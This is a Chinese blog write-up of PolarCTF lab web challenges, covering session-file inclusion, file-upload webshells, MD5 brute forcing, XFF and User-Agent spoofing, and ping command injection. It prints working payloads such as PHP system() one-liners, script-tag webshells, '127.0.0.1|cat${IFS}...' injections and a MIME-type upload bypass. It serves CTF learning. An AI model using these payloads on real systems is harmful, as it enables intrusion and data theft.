polarctf靶场【web】session文件包含、自由的文件上传系统、爆破、XFF、 rce1、iphone、ezupload

最新推荐文章于 2024-05-05 18:23:19 发布
最新推荐文章于 2024-05-05 18:23:19 发布
阅读量1.1k 收藏 29
点赞数 24
分类专栏: polarctf靶场 wp 文章标签: android studio ide web 算法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73981089/article/details/138217768
版权

[web]session文件包含

考点:session文件包含

随便输入

用伪协议进行读取(base64编码)

?file=php://filter/convert.base64-encode/resource=action.php

将其base64解码

是一个php代码

session文件名的构造是sess_ + sessionid , sessionid在cookie中可以查看

有了参数,开始猜存放session文件的位置,一般默认为tmp,直接执行命令访问session文件

这里可以采取两种方式得到flag:命令读取或者蚁剑连接shell

方法一:蚁剑连接shell

查到cookie值

再用post传一句话木马

用蚁剑来连接

方法二:命令读取
?file=/tmp/sess_iicon09s8aj9rhenj3rn6lhqj2
name=<?php system('ls')?>


name=<?php system('sort /flaggggg ');?>
name=<?php system('cat /flaggggg ');?>
name=<?php system('tac /flaggggg ');?>

[web]自由的文件上传系统

考点:文件包含

尝试上传一句话木马,文件名被改为任意数字

访问路径,发现问号被替换

返回主页的房子,可以看到一个子域名:

/sectet_include.php?file=index.html

可能是文件包含

上传一个不需要?的php木马用script标签进行操作

<script language="php">ststem("ls");</script>

 看到flag的根目录,不能直接用cat直接查看,再上传一个木马

<script language="php">system("cat /f1ag_1s_h3R3_And_You_W1LL_n3v3R_F1nd");</script>

[web]爆破

方法一:

get方式传入 一个pass变量,且满足其 md5 值 满足:

直接进行脚本爆破

import hashlib
 
for i in range(1,10000):
 
    md5 = hashlib.md5(str(i).encode('utf-8')).hexdigest()
 
    if md5[1] != md5[14] or md5[14]!= md5[17]:
        continue
 
    if(ord(md5[1]))>=48 and ord(md5[1])<=57 and (ord(md5[31]))>=48 and ord(md5[31])<=57:
 
        if((int(md5[1])+int(md5[14])+int(md5[17]))/int(md5[1])==int(md5[31])):
 
           print(i)

然后就有了两个哈希值,直接输入pass就可以过了,一个是422,一个是1202

方法二:(应该是个意外解)

源代码显示有个文件包含,直接查看flag

[web]XFF

考点:XXF伪造

根据题意知道是XFF伪造了,那么进题直接抓包伪造就行:

要ip是1.1.1.1,那么我们直接伪造就行:

点击发送

XFF

X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。

xff 是http的拓展头部,作用是使Web服务器获取访问用户的IP真实地址(可伪造)。由于很多用户通过代理服务器进行访问,服务器只能获取代理服务器的IP地址,而xff的作用在于记录用户的真实IP,以及代理服务器的IP。

格式为:

X-Forwarded-For: 本机IP, 代理1IP, 代理2IP, 代理2IP

 

[web] rce1

考点:rce
方法一:

代码是一道命令执行的题目,并且过滤了空格,看题目有个ip,考虑拼接符输入命令:

|      只执行第二个命令
||     先执行第一个命令若成功则继续执行第二个命令
&      不管第一个命令是否执行成功都会执行第二个命令
&&     必须两个命令都成功才能执行
;     类似&

ping -c 4 {$ip}这很熟悉了,输入127.0.0.1|ls,返回一个fllllaaag.php

?ip=127.0.0.1|ls

直接查看其文件,查看源码 

方法二

直接输入127.0.0.1|cat${IFS}fllllaaag.php,就返回一个问号,查看源代码

?ip=127.0.0.1|cat${IFS}fllllaaag.php
?ip=127.0.0.1|cat%09f*

 

[web]iphone

考点:UA的修改

先看源代码,发现有个提示尝试修改UA,得到提示后直接抓包修改UA为iphone类型,随便点了一下Enter键,发现它需要我们从iPhone而不是windows访问:

user agent查询(iPhone/ Android/ iPad/ Windows Phone/ Macintosh)_iphone user-agent-CSDN博客

Mozilla/5.0(iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.461 Firefox/124.0

[web]ezupload

考点:文件上传漏洞

随便上传一个文件,提示文件类型为GIF

用bp抓包,将图片类型改成gif传马就上传成功了

然后访问就是木马了,直接上蚁剑:

得到flag

剁椒排骨
关注
  • 24
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
linux 下将指定文件以0xFF填充到指定大小源码
01-15
linux 下将指定文件在结尾添加0xFF添加到指定大小(源码)。用法gcc 编译后运行,有帮助命令。4G以上文件未测试。(A:代码风格糟糕注释少,还是没人用的生僻工具,骗分!B:啥~骗分?技术上的事情不叫骗。)
Web】记录Polar靶场<简单>难度题一遍过(全)
uuzeray的博客
04-01 1013
明天XYCTF开始,今天干啥也不是,过过签到八股吧。
Polar靶场 简单难度
konpure的博客
12-26 1171
该代码中存在str_ireplace()函数,该函数的具体作用就是在第三个参数中寻找第一个参数,找到后替换成第二个参数的值,第四个参数(可不写)记录替换次数,于是我们在上传木马文件时将后缀由php改为pphphp。用该jwt代替原有的jwt值发包,发送之后发现什么也没有,查看了wp之后得知用户名应该是admin而不是admin,于是再用admin作为id得到新的jwt,替换后发包,在密码处得到flag。发现cookie为user=user,抓包将user修改为admin后上传,得到flag。
【1.15-1.21刷题日记】
qq_74240553的博客
01-18 918
CTFpolctf靶场
网络安全专业名词解释
aixmmmlll的博客
05-16 3647
1.Burp Suite 是一款信息安全从业人员必备的集成型的渗透测试工具,它采用自动测试和半自动测试的方式,通过拦截HTTP/HTTPS的Web数据包,充当浏览器和相关应用程序的中间人,进行拦截、修改、重放数据包进行测试,是Web安全人员的一把必备的瑞士军刀。 2.Bypass就是绕过的意思,渗透测试人员通过特殊语句的构建或者做混淆等进行渗透测试,然后达到绕过WAF的手法。 3.C2全称为Command and Control,命令与控制,常见于APT攻击场景中。作动词解释时理解为恶意软件与攻击者进行交互
把bin填充0xFF到指定大小(含源码)
12-25
在mcu开发的时候, 特别是做升级文件的时候, 我们有时候需要把一个bin文件,填充指定大小,填充0xFF。 做了一个很简单的小工具,填充0xFF,到指定大小,例如16K。利用批处理就可以执行,支持相对路径。
STC8单片机读写内部EEPROM KEIL工程文件源码.zip
11-16
STC8单片机读写内部EEPROM KEIL工程文件源码: /* STC8 内部EEPROM测试 从手册717页上可以看出 STC8的 EEPROM空间为1k 地址在0000h-03ffh 地址也是1024的大小 次程序结合手册 编写 大同小异 程序的主要目的是 先清楚...
块状:将像素艺术图像转换为Web的SVG文件:robot:
02-05
块状将像素图稿图像文件转换为Web的SVG。用法使用blocky非常简单:给它一个PNG文件,它将SVG数据写入标准输出。 $ blocky [-debug] [-keepInvisible] [-exclude=#RRGGBB[AA]] [-optimize=pixels|rects] FILEblocky...
fuse-smallfs:FUSE 小型文件系统
06-03
FUSE 小型文件系统 SmallFS在 FUSE 驱动程序的实现中,用于小而简单的文件系统。 该驱动程序已被实施以用作 UNITEC (Universidad Tecnologica Centroamericana ) 的操作系统类的一部分。 该文件系统由美国大学的 ...
Android Studio 之像素
最新发布
zzjnlwb的专栏
05-05 220
Android支持的像素单位有:px(像素)、in(英寸)、mm(毫米)、pt(磅,1/72英寸)、dp(与设备无关的显示单位)、dip(就是dp)、sp(用于设置字体大小)。一般来说,同样尺寸的屏幕(比如5寸的手机)看起来越清晰,像素的密度越高,以px计量的分辨率也越大。一般来说,同样尺寸的屏幕以dp计量的分辨率是一样的,无论这个手机是哪个厂家生产的,dp大小都一样。在XML布局文件中,为了让不同设备屏幕拥有统一的显示效果,除了sp用于设置文字大小外,其余要用尺寸大小的地方都用dp。
Android Studio实现简单的自定义钟表
振华OPPO的博客世界
05-03 875
在安卓开发中,当系统自带的View已经无法满足项目需求时,就要自定义View。在Android中是没有与钟表有关的View,因此我们制作一个简单的钟表View,这样就可以在其他项目中进行使用。自定义钟表具有表盘,表盘上有12个刻度,有时针、分针、秒针,和家里面的石英表样式相同,用于显示时间会比数码表更加有内涵。总的来说,本次自定义钟表项目可以学习到编程技巧,并且加深对Canvas API的理解。大家可以考虑添加一些定制选项,如不同的表盘样式、颜色或字体,以便用户可以根据自己的喜好来个性化他们的时钟;
Android studio Button 监听敲击事件
zhaoluruoyan89的博客
04-29 401
第二种方法只要引用View.OnClickListener这个接口就行,接着Button button=findViewById(R.id.button);下面就是重写onClick()方法,一般使用switch语句,参数是view,可以根据不同id来赋予不同的点击事件,不用像上面匿名内部类那样每一个按钮都要单独设置一下点击事件。然后我们在MainActivity 里面写一个onClick()方法,这里就不是重写了,因为我们没有任何继承父类和引用接口,这里的方法名可以随意取。
android studio拍照功能问题解决
2202_75519246的博客
04-29 517
1.点击拍照功能直接闪退。2.拍照后不能选择确认。拍照后不能选择确认,大部分原因是临时路径保存不上的问题。将源代码中的临时路径保存代码换成以下代码,能解决大部分该问题。上述是在android studio做项目中经常会使用到模拟器或真机的拍照功能时主要遇到的两个问题。上述问题若还未解决,查看是否添加了动态权限。加入以上代码能有效解决90%的闪退问题。2.拍照后不能选择确认键,无法保存。添加地点:点击拍照按钮方法中。
android studio项目实战——备忘录(附源码)
2202_75519246的博客
04-29 941
一共5张图片,粘贴到工程的drawable文件夹下来,其中bgone.png,bgthree.jpg两个图片是登录界面和信息添加界面的背景,buttonbg.png,savebg.png图片是添加备忘录按钮和保存按钮的背景,另外一张背景图片是sunshine.jpg是一张默认显示的照片。展开工程,打开app下方的build.gradle ,添加依赖,如下:依赖添加好之后,要记着同步,在页面右上角的位置单击:Sync Now 即可。注意:activity文件中相关的名称报错,得换成自己所创建工程的名字。
Android Studio的笔记--布局文件
weixin_45208598的博客
04-29 573
android layout 布局和一些控件的使用
易语言IDE界面美化支持库
m0_70202644的博客
04-29 287
直接将clr和lib丢到易语言安装目录中,这样子就安装完成了。必须在易语言安装目录中将上述安装文件删除。下载下来可以看到,是一个压缩包。打开易语言,在支持库配置界面勾选。那么,怎么安装到易语言中呢?后想回到原版界面,只取消勾选。解压之后,得到这两个文件。
笔试强训-day17_T2 十字爆破
weixin_46186903的博客
05-03 683
模拟即可,但是由于数据量过⼤,我们可以提前把每⼀⾏以及每⼀列的和存起来,⽅便统计总和。解法二:提前把每⼀⾏以及每⼀列的和存起来,然后输入输出使用快速的IO方式,解答如下所示。解法一:暴力遍历,这种方法很容易想到,并且也容易编写出代码,但是会超时。因为1+2+3=6,1+2+4=7,1+3+4=8,2+3+4=9。牛牛选择一个方格,可以得到和这个方格同行、同列的所有数之和的得分。现在牛牛想知道下一步选择每个格子的得分情况,你可以帮帮他吗?m个方格,每个方格中有一个整数。
leetcode16-3Sum Closest
我的程序人生
04-29 359
这道题目和那道3Num的题目很类似,解题思路也是类似的,我们先对数组排序,然后固定一个元素,通过双指针遍历剩下的元素,用一个哨兵记录三个元素的和与target的diff,分别处理三个元素的和小于target,大于target,等于target这三种情况即可。请你从 nums 中选出三个整数,使它们的和与 target 最接近。解释:与 target 最接近的和是 2 (-1 + 2 + 1 = 2)。输入:nums = [-1,2,1,-4], target = 1。假定每组输入只存在恰好一个解。
展示代码 上传一个文件到分布式文件系统,验证其可用性
06-07
好的,以下是使用Java代码上传文件到Hadoop HDFS并验证其可用性的示例: ```java import java.io.FileInputStream; import java.io.IOException; import java.io.InputStream; import java.security.MessageDigest; import java.security.NoSuchAlgorithmException; import org.apache.hadoop.conf.Configuration; import org.apache.hadoop.fs.FileSystem; import org.apache.hadoop.fs.Path; public class HdfsExample { public static void main(String[] args) throws Exception { // 创建HDFS配置 Configuration conf = new Configuration(); conf.set("fs.default.name", "hdfs://localhost:9000"); // 创建HDFS客户端 FileSystem fs = FileSystem.get(conf); // 定义本地文件路径和HDFS文件路径 String localPath = "localfile.txt"; String hdfsPath = "/test/hdfsfile.txt"; // 上传文件到HDFS Path srcPath = new Path(localPath); Path dstPath = new Path(hdfsPath); fs.copyFromLocalFile(srcPath, dstPath); // 下载文件并计算MD5校验和 InputStream in = fs.open(dstPath); MessageDigest md5 = MessageDigest.getInstance("MD5"); byte[] buffer = new byte[1024]; int numRead; do { numRead = in.read(buffer); if (numRead > 0) { md5.update(buffer, 0, numRead); } } while (numRead != -1); in.close(); // 获取计算出的MD5校验和 byte[] md5Bytes = md5.digest(); StringBuilder sb = new StringBuilder(); for (int i = 0; i < md5Bytes.length; i++) { sb.append(Integer.toString((md5Bytes[i] & 0xff) + 0x100, 16).substring(1)); } String md5Checksum = sb.toString(); // 输出结果 System.out.println("File uploaded to HDFS and MD5 checksum is: " + md5Checksum); // 关闭HDFS客户端 fs.close(); } } ``` 在这个示例中,我们使用Hadoop HDFS作为分布式文件系统,创建了一个本地文件 `localfile.txt`,并将其上传到HDFS中的路径 `/test/hdfsfile.txt`。然后,我们从HDFS中下载文件,并使用Java的`MessageDigest`类计算MD5校验和。最后,我们将计算出的MD5校验和打印到控制台上。 需要注意的是,运行此示例需要将Hadoop HDFS的相关JAR包添加到项目中。此外,还需要启动Hadoop HDFS并确保其可用性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

剁椒排骨

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值